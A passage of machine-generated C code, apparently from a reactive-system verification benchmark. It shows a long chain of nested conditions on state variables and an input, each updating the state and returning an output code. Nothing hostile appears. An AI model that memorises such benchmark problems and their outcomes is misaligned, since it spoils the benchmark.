} else if((((a25==1)&&((a1==1)&&((a4==17)&&((input==2)&&((((!(a7==1)&&((a28==15)&&(a26==18)))&&(a14==20))||((((a28==15)&&(a26==19))&&!(a7==1))&&(a14==20)))||(((a7==1)&&((a26==17)&&(a28==16)))&&(a14==18)))))))&&!(a3==1))){
a26 = 19;
a14 = 20;
a28 = 16;
a7 = 0;
return 24;
} else if(((a1==1)&&((((a25==1)&&((((((a7==1)&&(a26==17))&&(a14==19))||(((!(a7==1)&&(a26==18))&&(a14==18))||(((a26==19)&&!(a7==1))&&(a14==18))))&&(input==6))&&(a3==1)))&&(a28==16))&&(a4==17)))){
a26 = 17;
a28 = 15;
a4 = 16;
a14 = 18;
a7 = 1;
return -1;
} else if(((((!(a3==1)&&((a25==1)&&((a14==18)&&((input==3)&&((((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17)))||((a26==18)&&!(a7==1)))))))&&(a28==17))&&(a1==1))&&(a4==18))){
a7 = 0;
a26 = 19;
return 24;
} else if((!(a3==1)&&((((a1==1)&&(((a7==1)&&((a28==16)&&((a14==20)&&(input==6))))&&(a4==17)))&&(a26==17))&&(a25==1)))){
a14 = 19;
a7 = 0;
a26 = 19;
a28 = 17;
return 24;
} else if(((((a25==1)&&(((((((a26==17)||(a26==18))&&(input==5))&&!(a3==1))&&(a4==18))&&(a14==18))&&(a28==17)))&&(a7==1))&&(a1==1))){
a26 = 18;
a3 = 1;
a7 = 0;
a4 = 16;
return -1;
} else if(((a28==16)&&(((!(a3==1)&&((a4==18)&&((((input==1)&&((a26==17)||(a26==18)))&&(a25==1))&&(a7==1))))&&(a14==18))&&(a1==1)))){
a28 = 15;
a3 = 1;
a26 = 17;
a4 = 16;
return -1;
} else if(((((((a3==1)&&((((((a26==19)&&!(a7==1))&&(a14==19))||((a14==20)&&((a26==17)&&(a7==1))))||(((a26==18)&&(a7==1))&&(a14==20)))&&(input==1)))&&(a25==1))&&(a1==1))&&(a28==15))&&(a4==18))){
a7 = 0;
a28 = 17;
a26 = 19;
a14 = 20;
return 21;
} else if((((a28==16)&&(!(a3==1)&&((a14==19)&&((a4==17)&&(!(a7==1)&&(((a26==19)&&(input==1))&&(a1==1)))))))&&(a25==1))){
a28 = 15;
a3 = 1;
a4 = 16;
a7 = 1;
a26 = 17;
a14 = 18;
return -1;
} else if(((a1==1)&&((a3==1)&&((a25==1)&&((a4==18)&&((((a14==18)&&((a7==1)&&((a28==16)&&(a26==17))))||(((a14==20)&&(((a28==15)&&(a26==18))&&!(a7==1)))||((!(a7==1)&&((a28==15)&&(a26==19)))&&(a14==20))))&&(input==2))))))){
a7 = 1;
a4 = 16;
a14 = 18;
a28 = 15;
a26 = 17;
return -1;
} else if((((a3==1)&&(((a4==18)&&(((a1==1)&&((a14==18)&&((input==6)&&!(a7==1))))&&(a28==16)))&&(a26==19)))&&(a25==1))){
a4 = 16;
a28 = 15;
a7 = 1;
a26 = 17;
return -1;
} else if(((((((a25==1)&&((a26==18)&&(((a4==18)&&(input==4))&&(a28==16))))&&(a1==1))&&!(a7==1))&&(a14==19))&&!(a3==1))){
a4 = 16;
a14 = 18;
a3 = 1;
a7 = 1;
return -1;
} else if((((a1==1)&&((((((((a14==18)&&((a26==18)&&!(a7==1)))||((!(a7==1)&&(a26==19))&&(a14==18)))||((a14==19)&&((a26==17)&&(a7==1))))&&(input==1))&&(a4==17))&&(a28==17))&&(a25==1)))&&(a3==1))){
a4 = 16;
a7 = 1;
a28 = 15;
a26 = 17;
a14 = 18;
return -1;
} else if(((a4==16)&&((!(a3==1)&&(((((a1==1)&&((input==5)&&(a25==1)))&&!(a7==1))&&(a28==17))&&(a14==19)))&&(a26==17)))){
a14 = 18;
a7 = 1;
a3 = 1;
a28 = 15;
return -1;
} else if(((a4==16)&&((a25==1)&&(((a1==1)&&(((((input==3)&&((a26==17)||(a26==18)))&&!(a3==1))&&(a28==15))&&!(a7==1)))&&(a14==20))))){
a26 = 17;
a3 = 1;
a7 = 1;
a14 = 18;
return -1;
} else if((!(a3==1)&&((a1==1)&&((a25==1)&&(((((input==6)&&((((a7==1)&&(a26==19))||((a26==17)&&!(a7==1)))||(!(a7==1)&&(a26==18))))&&(a4==17))&&(a28==17))&&(a14==18)))))){
a7 = 1;
a26 = 17;
a28 = 15;
a3 = 1;
a4 = 16;
return -1;
} else if(((a1==1)&&((a4==16)&&(!(a7==1)&&(((((a26==17)&&((a25==1)&&(input==1)))&&!(a3==1))&&(a14==18))&&(a28==17)))))){
a26 = 18;
a7 = 1;
return 21;
} else if(((((((a28==15)&&(((((a26==17)||(a26==18))&&(input==6))&&!(a3==1))&&!(a7==1)))&&(a1==1))&&(a14==19))&&(a25==1))&&(a4==16))){
a7 = 1;
a14 = 18;
a3 = 1;
a26 = 17;
return -1;
} else if(((a28==16)&&((a14==19)&&(((a7==1)&&(((((input==1)&&(a26==17))&&(a1==1))&&(a4==18))&&(a3==1)))&&(a25==1))))){
a4 = 16;
a28 = 15;
a14 = 18;
return -1;
} else if((((((a4==17)&&((a28==16)&&(((input==2)&&(((a26==17)&&!(a7==1))||(((a26==18)&&(a7==1))||((a26==19)&&(a7==1)))))&&(a25==1))))&&(a1==1))&&(a14==20))&&(a3==1))){
a7 = 0;
a26 = 17;
a4 = 18;
a28 = 15;
return 22;
} else if(((((a4==18)&&((a25==1)&&((a1==1)&&((((a14==18)&&((a26==19)&&!(a7==1)))||((a14==19)&&((a7==1)&&(a26==17))))&&(input==1)))))&&(a3==1))&&(a28==17))){
a14 = 20;
a28 = 16;
a7 = 1;
a26 = 17;
return -1;
} else if(((a25==1)&&((((a14==18)&&((!(a3==1)&&((input==6)&&((((a7==1)&&(a26==19))||((a26==17)&&!(a7==1)))||((a26==18)&&!(a7==1)))))&&(a1==1)))&&(a4==18))&&(a28==17)))){
a4 = 16;
a26 = 18;
a7 = 1;
return 24;
} else if((((a4==17)&&(((a28==15)&&(((a1==1)&&((((a26==17)||(a26==18))&&(input==4))&&(a14==18)))&&(a25==1)))&&!(a7==1)))&&!(a3==1))){
a26 = 18;
return -1;
} else if(((a25==1)&&(((a1==1)&&((((((input==3)&&((a26==17)||(a26==18)))&&!(a7==1))&&(a28==15))&&!(a3==1))&&(a4==16)))&&(a14==19)))){
a14 = 18;
a26 = 17;
a7 = 1;
a3 = 1;
return -1;
} else if((((a4==16)&&((a1==1)&&(((((((!(a7==1)&&(a26==19))&&(a14==19))||(((a7==1)&&(a26==17))&&(a14==20)))||(((a7==1)&&(a26==18))&&(a14==20)))&&(input==4))&&(a28==17))&&!(a3==1))))&&(a25==1))){
a26 = 17;
a14 = 18;
a3 = 1;
a7 = 1;
a28 = 15;
return -1;
} else if(((a28==15)&&((a4==17)&&((a14==20)&&((a1==1)&&(((((((a26==17)||(a26==18))||(a26==19))&&(input==1))&&!(a3==1))&&(a7==1))&&(a25==1))))))){
a4 = 16;
a26 = 17;
a14 = 18;
a3 = 1;
return -1;
} else if(((!(a7==1)&&(((((a4==18)&&((a1==1)&&((a3==1)&&(input==6))))&&(a14==18))&&(a26==18))&&(a28==16)))&&(a25==1))){
a26 = 17;
a4 = 16;
a7 = 1;
a28 = 15;
return -1;
} else if((!(a7==1)&&(((!(a3==1)&&((((a14==18)&&((input==6)&&(a4==18)))&&(a25==1))&&(a28==15)))&&(a1==1))&&(a26==18)))){
a7 = 1;
a26 = 17;
a3 = 1;
a4 = 16;
return -1;
} else if(((((a14==19)&&(((((a1==1)&&((input==3)&&((a26==18)||(a26==19))))&&(a25==1))&&(a4==18))&&(a28==15)))&&!(a3==1))&&!(a7==1))){
a4 = 16;
a3 = 1;
a26 = 17;
a14 = 18;
a7 = 1;
return -1;
} else if(((((((a7==1)&&((a4==17)&&((a25==1)&&(((a26==19)||((a26==17)||(a26==18)))&&(input==2)))))&&!(a3==1))&&(a1==1))&&(a28==17))&&(a14==20))){
a4 = 16;
a26 = 17;
a14 = 18;
a28 = 15;
a3 = 1;
return -1;
} else if(((a4==16)&&((a28==15)&&(((a1==1)&&(((((input==2)&&((a26==17)||(a26==18)))&&!(a7==1))&&(a14==20))&&!(a3==1)))&&(a25==1))))){
a26 = 17;
a14 = 18;
a7 = 1;
a3 = 1;
return -1;
} else if((((((a1==1)&&((((((a26==19)&&!(a7==1))&&(a14==18))||(((a7==1)&&(a26==17))&&(a14==19)))&&(input==2))&&(a28==17)))&&(a25==1))&&(a4==16))&&!(a3==1))){
a7 = 1;
a14 = 18;
a28 = 15;
a26 = 17;
a3 = 1;
return -1;
} else if((((((a3==1)&&((input==1)&&((((a7==1)&&((a28==17)&&(a26==17)))&&(a14==18))||(((((a28==16)&&(a26==18))&&!(a7==1))&&(a14==20))||((!(a7==1)&&((a28==16)&&(a26==19)))&&(a14==20))))))&&(a25==1))&&(a1==1))&&(a4==18))){
a28 = 15;
a4 = 16;
a14 = 18;
a7 = 1;
a26 = 17;
return -1;
} else if(((a1==1)&&((a26==17)&&(!(a7==1)&&(((((a3==1)&&((a25==1)&&(input==2)))&&(a4==18))&&(a28==15))&&(a14==20)))))){
a14 = 18;
a7 = 1;
a4 = 16;
return -1;
} else if(((a26==18)&&(!(a3==1)&&((a14==19)&&(((a25==1)&&((a7==1)&&(((input==6)&&(a28==16))&&(a4==18))))&&(a1==1)))))){
a3 = 1;
a26 = 17;
a4 = 16;
a28 = 15;
a14 = 18;
return -1;
} else if(((((a4==16)&&(((!(a3==1)&&((input==5)&&(((a7==1)&&(a26==19))||(!(a7==1)&&(a26==17)))))&&(a28==16))&&(a1==1)))&&(a25==1))&&(a14==20))){
a28 = 15;
a3 = 1;
a7 = 1;
a14 = 18;
a26 = 17;
return -1;
} else if((((((a25==1)&&(((a1==1)&&((input==5)&&(((a26==17)&&!(a7==1))||(((a7==1)&&(a26==18))||((a26==19)&&(a7==1))))))&&(a4==18)))&&(a3==1))&&(a14==18))&&(a28==16))){
a4 = 16;
a26 = 17;
a28 = 15;
a7 = 1;
return -1;
} else if((((a4==18)&&((((a25==1)&&((a26==17)&&(((input==3)&&(a28==16))&&(a14==20))))&&(a7==1))&&(a1==1)))&&(a3==1))){
a4 = 16;
a28 = 15;
a14 = 18;
return -1;
} else if((((a25==1)&&(((a14==18)&&(!(a3==1)&&(((input==4)&&(((a7==1)&&(a26==19))||((a26==17)&&!(a7==1))))&&(a28==15))))&&(a1==1)))&&(a4==18))){
a26 = 18;
a7 = 1;
a14 = 19;
return 22;
} else if((((((a1==1)&&((a4==18)&&((a14==19)&&((a3==1)&&((a26==17)&&(input==4))))))&&(a28==15))&&(a25==1))&&(a7==1))){
a14 = 18;
a4 = 16;
return -1;
} else if(((a25==1)&&((((a28==17)&&(((a1==1)&&((input==5)&&((((a7==1)&&(a26==18))||((a26==19)&&(a7==1)))||((a26==17)&&!(a7==1)))))&&(a4==17)))&&(a14==19))&&(a3==1)))){
a14 = 18;
a28 = 15;
a26 = 17;
a7 = 1;
a4 = 16;
return -1;
} else if(((a1==1)&&((a25==1)&&((a4==16)&&((a28==17)&&((!(a7==1)&&((a14==19)&&(!(a3==1)&&(input==1))))&&(a26==17))))))){
a26 = 19;
a28 = 15;
a14 = 20;
a4 = 17;
return 24;
} else if(((a25==1)&&((((a1==1)&&((((a14==18)&&(((a28==16)&&(a26==17))&&(a7==1)))||(((((a26==18)&&(a28==15))&&!(a7==1))&&(a14==20))||((!(a7==1)&&((a26==19)&&(a28==15)))&&(a14==20))))&&(input==5)))&&(a3==1))&&(a4==18)))){
a4 = 16;
a14 = 18;
a28 = 15;
a26 = 17;
a7 = 1;
return -1;
} else if(((a26==18)&&((a7==1)&&((((((a28==17)&&((a3==1)&&(input==3)))&&(a25==1))&&(a1==1))&&(a4==17))&&(a14==20))))){
a4 = 18;
a28 = 16;
return 26;
} else if(((a26==17)&&((a1==1)&&(((a28==15)&&((a3==1)&&((a14==20)&&(((input==4)&&(a25==1))&&(a4==18)))))&&!(a7==1))))){
a3 = 0;
a14 = 18;
a4 = 16;
return 26;
} else if((!(a3==1)&&((a4==18)&&(((a28==17)&&((a25==1)&&(((((a7==1)&&(a26==18))&&(a14==19))||(((a14==18)&&((a26==19)&&!(a7==1)))||(((a26==17)&&(a7==1))&&(a14==19))))&&(input==5))))&&(a1==1))))){
a3 = 1;
a4 = 16;
a7 = 1;
a14 = 20;
a26 = 18;
a28 = 15;
return -1;
} else if(((a26==19)&&(((a25==1)&&(!(a3==1)&&((a28==15)&&((a1==1)&&(((input==1)&&(a7==1))&&(a4==16))))))&&(a14==20)))){
a14 = 19;
a28 = 17;
a26 = 18;
return 24;
} else if(((((((((a14==20)&&(((a28==15)&&(a26==19))&&!(a7==1)))||((((a28==16)&&(a26==17))&&(a7==1))&&(a14==18)))&&(input==6))&&(a4==16))&&(a25==1))&&(a1==1))&&!(a3==1))){
a7 = 1;
a3 = 1;
a26 = 17;
a28 = 15;
a14 = 18;
return -1;
} else if((((a7==1)&&(((a25==1)&&(((a28==15)&&((a4==16)&&(((a26==17)||(a26==18))&&(input==2))))&&(a1==1)))&&!(a3==1)))&&(a14==20))){
a26 = 17;
a3 = 1;
a14 = 18;
return -1;
} else if((!(a3==1)&&((((a28==16)&&((a4==16)&&(((((a7==1)&&(a26==19))||(!(a7==1)&&(a26==17)))&&(input==2))&&(a1==1))))&&(a25==1))&&(a14==18)))){
a28 = 15;
a3 = 1;
a26 = 17;
a7 = 1;
return -1;
} else if(((((a4==17)&&((a25==1)&&((a26==18)&&(((a14==20)&&((input==3)&&(a1==1)))&&(a7==1)))))&&(a3==1))&&(a28==15))){
a4 = 16;
a26 = 17;
a14 = 18;
return -1;
} else if((!(a3==1)&&((!(a7==1)&&((a1==1)&&(((a25==1)&&(((input==2)&&((a26==17)||(a26==18)))&&(a4==17)))&&(a14==18))))&&(a28==15)))){
a7 = 1;
a28 = 17;
a4 = 16;
a26 = 18;
return -1;
} else if(((a25==1)&&((((a28==15)&&(((a4==18)&&(!(a3==1)&&((input==1)&&((a26==18)||(a26==19)))))&&(a1==1)))&&(a14==20))&&!(a7==1)))){
a26 = 17;
a3 = 1;
a14 = 18;
a7 = 1;
a4 = 16;
return -1;
} else if(((a4==17)&&(((a3==1)&&((a1==1)&&((a25==1)&&((input==1)&&((((a7==1)&&(a26==17))&&(a14==19))||((((a26==18)&&!(a7==1))&&(a14==18))||(((a26==19)&&!(a7==1))&&(a14==18))))))))&&(a28==16)))){
a28 = 15;
a26 = 17;
a4 = 16;
a7 = 1;
a14 = 18;
return -1;
} else if(((!(a3==1)&&((a14==18)&&(((a1==1)&&(((((a7==1)&&(a26==19))||(!(a7==1)&&(a26==17)))&&(input==2))&&(a28==15)))&&(a25==1))))&&(a4==18))){
a4 = 16;
a7 = 1;
a3 = 1;
a26 = 17;
return -1;
} else if(((a4==17)&&((a14==19)&&(((a1==1)&&(((a28==16)&&(!(a3==1)&&((input==2)&&((a26==17)||(a26==18)))))&&(a25==1)))&&!(a7==1))))){
a26 = 18;
a28 = 17;
a4 = 16;
a7 = 1;
return 26;
} else if(((a14==20)&&((a1==1)&&((a25==1)&&(((((a4==17)&&((a28==15)&&(input==3)))&&(a26==19))&&(a3==1))&&(a7==1)))))){
a7 = 0;
a28 = 17;
a26 = 18;
a14 = 18;
return 24;
} else if((((a25==1)&&(((a1==1)&&((a4==16)&&(((input==4)&&(((a7==1)&&(a26==19))||((a26==17)&&!(a7==1))))&&(a28==16))))&&!(a3==1)))&&(a14==18))){
a7 = 1;
a3 = 1;
a28 = 15;
a26 = 17;
return -1;
} else if(((a25==1)&&((a28==17)&&((a1==1)&&((a7==1)&&((a14==18)&&((((input==1)&&!(a3==1))&&(a26==19))&&(a4==16)))))))){
a26 = 18;
return -1;
} else if(((a3==1)&&(((a25==1)&&(((((((a4==17)&&(a26==19))&&(a28==17))&&!(a7==1))&&(a14==20))||((a14==18)&&(((a28==15)&&((a4==18)&&(a26==17)))&&(a7==1))))&&(input==1)))&&(a1==1)))){
a7 = 1;
a26 = 17;
a14 = 18;
a28 = 15;
a4 = 16;
return -1;
} else if((((a1==1)&&(((((((!(a7==1)&&(a26==19))&&(a14==18))||((a14==19)&&((a7==1)&&(a26==17))))&&(input==6))&&(a4==16))&&(a25==1))&&(a28==17)))&&!(a3==1))){
a14 = 18;
a3 = 1;
a7 = 1;
a28 = 15;
a26 = 17;
return -1;
} else if((((a28==16)&&(!(a3==1)&&((a4==18)&&((((input==1)&&(((a26==19)&&(a7==1))||((a26==17)&&!(a7==1))))&&(a14==19))&&(a25==1)))))&&(a1==1))){
a7 = 0;
a28 = 15;
a14 = 18;
a4 = 17;
a26 = 18;
return 21;
} else if((((a28==15)&&((((!(a3==1)&&((a25==1)&&(((a26==18)||(a26==19))&&(input==2))))&&(a1==1))&&!(a7==1))&&(a14==20)))&&(a4==18))){
a7 = 1;
a4 = 16;
a3 = 1;
a14 = 18;
a26 = 17;
return -1;
} else if((((a7==1)&&(((a1==1)&&(!(a3==1)&&((((input==1)&&(a26==18))&&(a25==1))&&(a28==15))))&&(a4==18)))&&(a14==19))){
a14 = 20;
a7 = 0;
a4 = 16;
return 26;
} else if((((a14==19)&&(((!(a7==1)&&(((a1==1)&&(((a26==18)||(a26==19))&&(input==1)))&&(a3==1)))&&(a28==16))&&(a4==18)))&&(a25==1))){
a14 = 18;
a4 = 16;
a7 = 1;
a28 = 15;
a26 = 17;
return -1;
} else if((((a4==17)&&((a28==17)&&(!(a3==1)&&((((((a7==1)&&(a26==19))||(!(a7==1)&&(a26==17)))&&(input==6))&&(a14==19))&&(a1==1)))))&&(a25==1))){
a14 = 18;
a7 = 1;
a3 = 1;
a26 = 17;
a28 = 15;
a4 = 16;
return -1;
} else if(((a28==16)&&(((a4==17)&&((((((((a26==18)&&(a7==1))||((a26==19)&&(a7==1)))||(!(a7==1)&&(a26==17)))&&(input==6))&&(a14==20))&&(a1==1))&&!(a3==1)))&&(a25==1)))){
a14 = 19;
a26 = 18;
a7 = 0;
return 26;
} else if((((((a25==1)&&(((((input==3)&&(a1==1))&&(a7==1))&&(a4==16))&&(a14==18)))&&(a28==17))&&(a26==19))&&!(a3==1))){
a28 = 15;
a3 = 1;
a26 = 17;
return -1;
} else if((((a1==1)&&(((((a28==15)&&((a14==20)&&((((a26==17)||(a26==18))||(a26==19))&&(input==3))))&&!(a3==1))&&(a4==18))&&(a25==1)))&&(a7==1))){
a26 = 18;
a7 = 0;
return 26;
} else if((((a28==16)&&(!(a7==1)&&(((a14==20)&&((a1==1)&&((a4==17)&&(((a26==18)||(a26==19))&&(input==3)))))&&!(a3==1))))&&(a25==1))){
a26 = 17;
a28 = 15;
return -1;
} else if(((a28==17)&&((a7==1)&&(((a25==1)&&(!(a3==1)&&(((a14==20)&&((input==3)&&(((a26==17)||(a26==18))||(a26==19))))&&(a1==1))))&&(a4==17))))){
a14 = 18;
a3 = 1;
a26 = 17;
a4 = 16;
a28 = 15;
return -1;
} else if((((a4==18)&&((a14==20)&&((a3==1)&&((a1==1)&&((a28==17)&&(((input==2)&&(a26==18))&&!(a7==1)))))))&&(a25==1))){
a14 = 18;
a7 = 1;
a28 = 15;
a4 = 16;
a26 = 17;
return -1;
} else if(((a26==19)&&(((a7==1)&&(!(a3==1)&&((a4==16)&&(((a1==1)&&((a25==1)&&(input==1)))&&(a14==19)))))&&(a28==15)))){
a14 = 18;
a26 = 18;
a28 = 17;
return 22;
} else if((((a25==1)&&(((((a14==20)&&(((a28==17)&&((a26==19)&&((a4==18)&&(a3==1))))&&!(a7==1)))||((a14==18)&&((a7==1)&&((a28==15)&&((a26==17)&&((a4==16)&&!(a3==1)))))))||((a14==18)&&(((a28==15)&&((a26==18)&&(!(a3==1)&&(a4==16))))&&(a7==1))))&&(input==5)))&&(a1==1))){
a4 = 16;
a28 = 15;
a14 = 18;
a3 = 1;
a7 = 1;
a26 = 17;
return -1;
} else if(((((a7==1)&&((a4==17)&&(((a28==17)&&((a25==1)&&(((a26==17)||(a26==18))&&(input==2))))&&(a3==1))))&&(a1==1))&&(a14==18))){
a4 = 16;
a28 = 15;
a26 = 17;
return -1;
} else if(((a28==16)&&((((a25==1)&&(((a7==1)&&(((a26==18)&&(input==4))&&!(a3==1)))&&(a14==19)))&&(a1==1))&&(a4==18)))){
a28 = 15;
a4 = 16;
a14 = 18;
a26 = 17;
a3 = 1;
return -1;
} else if((((a4==18)&&((((((a26==17)&&((input==2)&&(a3==1)))&&(a28==15))&&(a14==19))&&(a7==1))&&(a25==1)))&&(a1==1))){
a4 = 16;
a14 = 18;
return -1;
} else if((((a1==1)&&((a25==1)&&((input==1)&&((((a14==20)&&(!(a7==1)&&((a28==17)&&((a4==16)&&(a26==18)))))||((a14==20)&&(((a28==17)&&((a26==19)&&(a4==16)))&&!(a7==1))))||((a14==18)&&((a7==1)&&((a28==15)&&((a26==17)&&(a4==17)))))))))&&!(a3==1))){
a7 = 1;
a14 = 18;
a4 = 16;
a26 = 18;
a28 = 17;
return -1;
} else if(((a1==1)&&((a3==1)&&(((a26==18)&&((a4==18)&&(((a25==1)&&((input==4)&&(a28==17)))&&!(a7==1))))&&(a14==18))))){
a28 = 15;
a26 = 17;
a4 = 16;
a7 = 1;
return -1;
} else if(((a26==18)&&((a25==1)&&((((a1==1)&&(!(a3==1)&&(((input==1)&&(a14==19))&&(a28==15))))&&!(a7==1))&&(a4==17))))){
a14 = 18;
return 21;
} else if(((a4==17)&&(((((!(a3==1)&&((a1==1)&&(((a26==17)||(a26==18))&&(input==3))))&&(a28==15))&&(a14==18))&&!(a7==1))&&(a25==1)))){
a7 = 1;
a26 = 18;
a28 = 17;
a4 = 16;
return 26;
} else if(((a4==17)&&(((a14==20)&&(((a28==15)&&((a7==1)&&((a25==1)&&((input==2)&&((a26==19)||((a26==17)||(a26==18)))))))&&!(a3==1)))&&(a1==1)))){
a26 = 18;
a14 = 19;
a4 = 16;
a28 = 17;
return -1;
} else if(((a26==18)&&((((a14==18)&&(((((a4==16)&&(input==4))&&(a7==1))&&!(a3==1))&&(a25==1)))&&(a1==1))&&(a28==16)))){
a28 = 15;
a3 = 1;
a26 = 17;
return -1;
} else if(((!(a3==1)&&((a25==1)&&((a14==19)&&((a4==16)&&(((a28==17)&&((input==1)&&(a26==18)))&&(a1==1))))))&&!(a7==1))){
a14 = 18;
a26 = 17;
a28 = 15;
a3 = 1;
a7 = 1;
return -1;
} else if((((a25==1)&&((a4==18)&&(((((((a26==17)&&!(a7==1))||(((a26==18)&&(a7==1))||((a7==1)&&(a26==19))))&&(input==2))&&(a28==16))&&(a1==1))&&(a14==19))))&&(a3==1))){
a4 = 16;
a14 = 18;
a26 = 17;
a7 = 1;
a28 = 15;
return -1;
} else if(((((((a14==19)&&(!(a3==1)&&((((a7==1)&&(a26==19))||((a26==17)&&!(a7==1)))&&(input==3))))&&(a25==1))&&(a28==16))&&(a1==1))&&(a4==18))){
a26 = 17;
a7 = 1;
a4 = 16;
a28 = 17;
a3 = 1;
a14 = 18;
return -1;
} else if(((a14==19)&&(((a3==1)&&((a25==1)&&(((a28==17)&&((input==2)&&((!(a7==1)&&(a26==17))||(((a26==18)&&(a7==1))||((a7==1)&&(a26==19))))))&&(a4==18))))&&(a1==1)))){
a14 = 20;
a28 = 16;
a7 = 1;
a26 = 17;
return -1;
} else if((((a28==16)&&((!(a3==1)&&(((((a26==18)&&(input==3))&&(a4==18))&&(a14==19))&&!(a7==1)))&&(a1==1)))&&(a25==1))){
a3 = 1;
a28 = 15;
a14 = 20;
a7 = 1;
a26 = 19;
a4 = 16;
return -1;
} else if(((!(a7==1)&&((((a25==1)&&((a1==1)&&((((a26==18)||(a26==19))&&(input==1))&&(a4==18))))&&(a28==16))&&!(a3==1)))&&(a14==20))){
a26 = 18;
a14 = 18;
a28 = 15;
a4 = 17;
return 23;
} else if(((a25==1)&&((a4==16)&&((a26==19)&&((a1==1)&&((((a28==15)&&((input==5)&&!(a3==1)))&&(a14==19))&&!(a7==1))))))){
a14 = 18;
a7 = 1;
a3 = 1;
a26 = 17;
return -1;
} else if((((a1==1)&&(!(a3==1)&&((((input==3)&&(((((a26==19)&&!(a7==1))&&(a14==18))||((a14==19)&&((a26==17)&&(a7==1))))||((a14==19)&&((a26==18)&&(a7==1)))))&&(a28==15))&&(a4==17))))&&(a25==1))){
a26 = 17;
a3 = 1;
a4 = 16;
a14 = 18;
a7 = 1;
return -1;
} else if(((a4==18)&&((a14==20)&&(((((a1==1)&&(!(a7==1)&&((a28==15)&&(input==5))))&&(a26==17))&&(a25==1))&&!(a3==1))))){
a14 = 18;
a7 = 1;
a4 = 16;
a3 = 1;
return -1;
} else if((((a25==1)&&(!(a3==1)&&((input==5)&&(((a14==18)&&((a7==1)&&((a28==15)&&((a4==17)&&(a26==17)))))||(((!(a7==1)&&(((a4==16)&&(a26==18))&&(a28==17)))&&(a14==20))||((!(a7==1)&&((a28==17)&&((a4==16)&&(a26==19))))&&(a14==20)))))))&&(a1==1))){
a7 = 1;
a4 = 16;
a26 = 17;
a3 = 1;
a28 = 15;
a14 = 18;
return -1;
} else if(((a7==1)&&((a4==18)&&((((a25==1)&&((a28==16)&&((a14==20)&&((input==4)&&(a3==1)))))&&(a26==17))&&(a1==1))))){
return -1;
} else if(((((a25==1)&&((a4==16)&&(((((a14==20)&&(((a26==18)&&(a28==16))&&!(a7==1)))||((((a26==19)&&(a28==16))&&!(a7==1))&&(a14==20)))||((a14==18)&&((a7==1)&&((a28==17)&&(a26==17)))))&&(input==4))))&&(a1==1))&&!(a3==1))){
a7 = 1;
a28 = 15;
a14 = 18;
a26 = 17;
a3 = 1;
return -1;
} else if((((a4==17)&&((((input==3)&&((((a14==20)&&(((a26==18)&&(a28==15))&&!(a7==1)))||((!(a7==1)&&((a26==19)&&(a28==15)))&&(a14==20)))||((a14==18)&&((a7==1)&&((a26==17)&&(a28==16))))))&&(a3==1))&&(a25==1)))&&(a1==1))){
a14 = 18;
a28 = 15;
a26 = 17;
a4 = 16;
a7 = 1;
return -1;
} else if(((((((a14==18)&&((a7==1)&&((a26==18)&&((input==5)&&(a1==1)))))&&!(a3==1))&&(a28==17))&&(a25==1))&&(a4==16))){
a26 = 17;
a3 = 1;
a28 = 15;
return -1;
} else if(((a4==18)&&(((a25==1)&&((((a3==1)&&(!(a7==1)&&(((a26==17)||(a26==18))&&(input==6))))&&(a1==1))&&(a28==15)))&&(a14==19)))){
a7 = 1;
a26 = 17;
a14 = 18;
a4 = 16;
return -1;
} else if((((a25==1)&&(!(a3==1)&&(((a1==1)&&((a28==17)&&((((a7==1)&&(a26==19))||((a26==17)&&!(a7==1)))&&(input==1))))&&(a4==17))))&&(a14==19))){
a28 = 15;
a4 = 16;
a3 = 1;
a7 = 1;
a14 = 18;
a26 = 17;
return -1;
} else if(((((((a28==15)&&((((input==2)&&!(a3==1))&&(a4==18))&&(a1==1)))&&!(a7==1))&&(a14==20))&&(a26==17))&&(a25==1))){
a7 = 1;
a4 = 16;
a14 = 18;
a3 = 1;
return -1;
} else if((((((a1==1)&&((a4==17)&&(!(a7==1)&&(((input==3)&&(a14==19))&&(a25==1)))))&&(a26==19))&&!(a3==1))&&(a28==17))){
a7 = 1;
a26 = 17;
a28 = 15;
a14 = 18;
a4 = 16;
a3 = 1;
return -1;
} else if(((a25==1)&&(((a3==1)&&((a7==1)&&(((a14==18)&&((((a26==18)||(a26==19))&&(input==3))&&(a28==15)))&&(a4==18))))&&(a1==1)))){
a26 = 17;
a4 = 16;
return -1;
} else if(((a1==1)&&((a4==18)&&((a28==16)&&((a14==20)&&(((a25==1)&&(((((a26==18)&&(a7==1))||((a26==19)&&(a7==1)))||((a26==17)&&!(a7==1)))&&(input==5)))&&(a3==1))))))){
a4 = 16;
a26 = 17;
a28 = 15;
a14 = 18;
a7 = 1;
return -1;
} else if(((((a1==1)&&((a3==1)&&((((input==4)&&((!(a7==1)&&(a26==17))||(((a7==1)&&(a26==18))||((a26==19)&&(a7==1)))))&&(a4==18))&&(a25==1))))&&(a28==16))&&(a14==20))){
a4 = 16;
a28 = 15;
a14 = 18;
a26 = 17;
a7 = 1;
return -1;
} else if(((a25==1)&&((a1==1)&&((((a3==1)&&((a14==18)&&((((a26==17)&&!(a7==1))||(((a26==18)&&(a7==1))||((a26==19)&&(a7==1))))&&(input==1))))&&(a28==17))&&(a4==18))))){
a4 = 16;
a7 = 1;
a26 = 17;
a28 = 15;
return -1;
} else if((((a4==17)&&(((a14==19)&&((a3==1)&&((a1==1)&&((input==5)&&((!(a7==1)&&(a26==18))||(((a7==1)&&(a26==19))||(!(a7==1)&&(a26==17))))))))&&(a25==1)))&&(a28==15))){
a7 = 0;
a28 = 16;
a14 = 18;
a26 = 17;
return 23;
} else if((((((((!(a7==1)&&(((a26==19)||((a26==17)||(a26==18)))&&(input==3)))&&(a25==1))&&(a14==20))&&(a4==17))&&(a28==17))&&!(a3==1))&&(a1==1))){
a3 = 1;
a14 = 18;
a26 = 17;
a4 = 16;
a7 = 1;
a28 = 15;
return -1;
} else if(((a26==17)&&((a3==1)&&((((a14==20)&&((a1==1)&&(((input==6)&&!(a7==1))&&(a28==15))))&&(a25==1))&&(a4==17))))){
a14 = 18;
a4 = 16;
a7 = 1;
return -1;
} else if(((a4==17)&&(((((a1==1)&&((a14==20)&&(((input==3)&&((a26==18)||(a26==19)))&&(a25==1))))&&!(a7==1))&&(a28==16))&&(a3==1)))){
a7 = 1;
a14 = 18;
a26 = 17;
a4 = 16;
a28 = 15;
return -1;
} else if(((a14==19)&&((!(a3==1)&&(((((input==6)&&((((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17)))||((a26==18)&&!(a7==1))))&&(a25==1))&&(a28==16))&&(a4==16)))&&(a1==1)))){
a3 = 1;
a28 = 15;
a7 = 1;
